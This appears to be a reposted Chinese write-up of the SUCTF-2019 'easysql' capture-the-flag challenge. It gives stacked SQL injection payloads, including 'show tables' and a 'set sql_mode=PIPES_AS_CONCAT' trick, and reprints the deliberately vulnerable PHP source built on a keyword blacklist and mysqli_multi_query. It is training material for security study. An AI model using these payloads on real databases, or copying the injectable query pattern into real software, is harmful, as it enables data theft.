2. 程式人生 > 其它 >CTFHub_SUCTF-2019-Web-easysql(堆疊注入)

CTFHub_SUCTF-2019-Web-easysql(堆疊注入)

阿新 發佈:2022-03-11

開啟靶場,顯示如下

burp跑一遍sql關鍵字,以下響應長度是629的是本題過濾的欄位

經過測試,發現未過濾堆疊注入

查看錶名 

1;show tables;#

方法一

看wp知道後端查詢語句如下,這是一種非預期解的方法:

$sql = "select ".$post['query']."||flag from Flag";

所以我們前端構造語句 *,1 這樣sql的語句就是這樣的了

select *,1||flag from Flag

 

方法二

通過堆疊注入將sql_mode的值設定為PIPES_AS_CONCAT,從而將 || 視為字串的連線操作符而非或運算子

payload:

query=1;set sql_mode=PIPES_AS_CONCAT;select 1

這樣在進行查詢的時候將||運算子當成連線符成這樣的語句

select 1,flag from Flag

 

 

附 原題再現

<?php
    session_start();

    include_once "config.php";

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
    if(!$MysqlLink){
        die("Mysql Connect Error!");
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die("Choose Database Error!");
    }

    foreach ($_POST as $k=>$v){
        if(!empty($v)&&is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=>$v){
        }
    }
    //die();
    
 
?>

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>

<?php

    if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }
        if(strlen($post['query'])>40){
            die("Too long.");
        }
        $sql = "select ".$post['query']."||flag from Flag";
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }

    
 
?>
View Code

參考:https://www.cnblogs.com/xhds/p/12286119.html

相關推薦

CTFHub_SUCTF-2019-Web-easysql堆疊注入

開啟靶場,顯示如下 burp跑一遍sql關鍵字,以下響應長度是629的是本題過濾的欄位

buuoj [強網杯]隨便注堆疊注入,prepare預定義

輸入1 輸入2 輸入3,無顯示。 輸入-1\' or 1=1,得到 order判斷欄位數為3 union select,回顯被過濾的函式:

web前端html-js

​ HTML 第1章 Html簡介與基本標籤 由標籤組成的叫做標記語言。 ​超文字標記語言

DVWA全級別通關筆記-- Command Injection命令注入

引言 結合DVWA提供的命令注入模組,對命令注入漏洞進行學習總結。命令注入Command Injection是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。

CSV InjectionCSV注入

簡介 許多web應用程式允許使用者將發票模板或使用者設定等內容下載到CSV檔案中。許多使用者選擇在Excel、Libre Office或open Office中開啟CSV檔案。當web應用程式無法正確驗證CSV檔案的內容時,可能會導致執行一個或

(第一篇)記一次python分散式web開發利用docker

作者:落陽 日期:2020-12-23 在一次專案開發中,決定使用docker+nginx+flask+mysql的技術棧來開發,用此係列文章記錄開發的過程。

Spring學習筆記——第四部分 Dependency Injection依賴注入

技術標籤:Spring學習筆記springjavaxml Spring學習筆記——第四部分 Dependency Injection依賴注入

JDBC:createStatementsql注入與PrepareStatement防止sql注入程式案例程式碼優化

技術標籤:學習經驗jdbc 把程式中重複的程式碼寫為一個工具類。createStatement package cn.dao;

python實現WEB自動化python+selenium

   一、瀏覽器驅動  selenium操作不同的瀏覽器,需要下載不同瀏覽器的驅動  以chrome瀏覽器為例:  1、進入到下載頁面,找到符合自己瀏覽器版本的驅動  2、下載好了之後,右鍵解壓到當前資料夾

Web前端十一-Mybatis框架

MyBatis框架 此框架是目前最流行的資料持久化框架,使用此框架可以完全免去JDBC程式碼操作資料(本質是將JDBC程式碼完全封裝) ,從而大大提高了開發效率;

Spring學習筆記-DI依賴注入

構造器注入見前貼 Set注入【重點】 依賴注入:Set注入 依賴:bean物件的建立依賴於容器

Web前端十四-VRD、首頁分類展示、輪播圖、登入、會話管理、Cookie和Session、Cookies記住使用者名稱和密碼、Session記住登入狀態

VRD 準備工作: 建立工程vrd 11改8 打3個勾 把昨天工程5-2的application.properties裡面內容複製到新工程, 把裡面的weibodb改成vrddb

Web前端十五-後臺管理頁面歡迎XXX登入和退出登入、釋出作品功能

後臺管理頁面 歡迎xxx和退出登入 在admin.html頁面中 建立vue物件管理header標籤,並在created裡面請求當前登入的使用者物件,在methods裡面宣告logout方法

解決Python web框架如Flask與vue渲染變數的衝突衝突會導致vue渲染報錯,網頁無法顯示

解決Python web框架如Flask與vue渲染變數的衝突衝突會導致vue渲染報錯,網頁無法顯示

【Azure 雲服務】Azure Cloud Service 為 Web RoleIIS Host增加自定義欄位 把HTTP Request Header中的User-Agent欄位增加到IIS輸出日誌中

問題描述 把Web Role服務釋出到Azure Cloud Service後,需要在IIS的輸出日誌中,把每一個請求的HTTP Request Header中的User-Agent內容也輸出到日誌中。通過Cloud Service雲服務如何實現呢?

Nginx 搭建靜態資源 Web 伺服器共享檔案

1.安裝nginx:yum install nginx -y 2.檢視是否安裝成功:rpm -qa | grep nginx 3.找到nginx的安裝目錄:/etc/nginx

.Net Core IOC依賴注入

原文連結:https://www.cnblogs.com/ysmc/p/16012269.html 暫時Transient 暫時生存期服務是每次從服務容器進行請求時建立的。 這種生存期適合輕量級、 無狀態的服務。

mysql學習13 SQL注入

mysql學習13 SQL注入: SQL存在漏洞,會被攻擊,導致資料洩露; SQL會被拼接 :or 1=1

利用xinetd實現簡單web伺服器映象站

瀏覽效果: linux伺服器安裝xinetd後,在/etc/xinetd.d/目錄下建立xhttpd檔案,並輸入內容:

SSTI模板注入漏洞

學習於:https://www.cnblogs.com/bmjoker/p/13508538.html 模板引擎 模板引擎這裡特指用於Web開發的模板引擎是為了使使用者介面與業務資料內容分離而產生的,它可以生成特定格式的文件,利用模板引擎來